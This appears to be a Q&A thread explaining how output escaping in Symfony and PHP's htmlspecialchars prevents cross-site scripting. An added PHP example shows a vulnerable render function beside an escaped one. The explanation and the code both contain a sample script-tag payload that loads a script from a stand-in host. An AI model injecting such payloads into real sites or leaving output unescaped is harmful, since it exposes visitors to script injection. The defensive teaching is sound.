 

How can escaping be used to prevent XSS attacks?

To prevent XSS attacks, output escaping has been enabled;

The above is from Symfony, but I don't understand.

user261527 asked Dec 17 '22 03:12



1 Answer

XSS is an abbreviation for "Cross-site scripting". Cross-site scripting attacks occur when you manage to sneak a script (usually JavaScript) onto someone else's website, where it can run maliciously.

XSS is possible when you have user input into a web site. For instance, if I was filling out a web form, and it asked me for my name, I could enter My name is <script src="http://bad.domain/evilscript.js"></script>. If I submit the form, and then on the next page it asks me to confirm my details and re-outputs what I entered, the nasty HTML tag that I entered would get rendered and the script would get downloaded and run by the browser.

In order to prevent this, you need to escape user input. Escaping means that you convert (or mark) key characters of the data to prevent it from being interpreted in a dangerous context. In the case of HTML output, you need to convert the < and > characters (among others), to prevent any malicious HTML from rendering. Escaping these characters involves turning them into their entity equivalents &lt; and &gt; (see PHP's htmlspecialchars() function), which will not be interpreted as HTML tags by a browser.

What Symfony is trying to tell you is that it has the capability to do this automatically for your output, and that capability is enabled.

zombat answered Jan 31 '23 00:01

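As an added example (not code from the answer above or from Symfony itself), here is the vulnerable output next to its escaped form in plain PHP, using the answer's payload as a constructed input; the function names `renderUnsafe`, `renderSafe` and `e` are chosen here for illustration:

```php
<?php
// Constructed sample input, modelled on the payload in the answer above.
$name = 'My name is <script src="http://bad.domain/evilscript.js"></script>';

// Vulnerable: the raw value is written straight into the HTML document,
// so the browser parses the <script> tag and runs the remote script.
function renderUnsafe(string $name): string
{
    return "<p>Hello, $name</p>";
}

// Escaper for HTML body and quoted-attribute context.
// ENT_QUOTES converts both ' and " (without it, single quotes pass through
// on PHP < 8.1), ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning
// an empty string, and the charset must match the page's declared encoding.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened: the same output, but every user-controlled value passes through e()
// at the moment it is written into HTML, so < > " ' & become entities.
function renderSafe(string $name): string
{
    return '<p>Hello, ' . e($name) . '</p>';
}

echo renderUnsafe($name), PHP_EOL;
echo renderSafe($name), PHP_EOL;
```

Symfony's Twig templates apply this same HTML escaping automatically to `{{ name }}`, which is what the quoted sentence means; the `raw` filter switches it off for a single expression. Note that HTML-entity escaping only protects HTML body and attribute context, so a value placed inside a `<script>` block, a URL or a CSS value needs the escaping rules for that context instead.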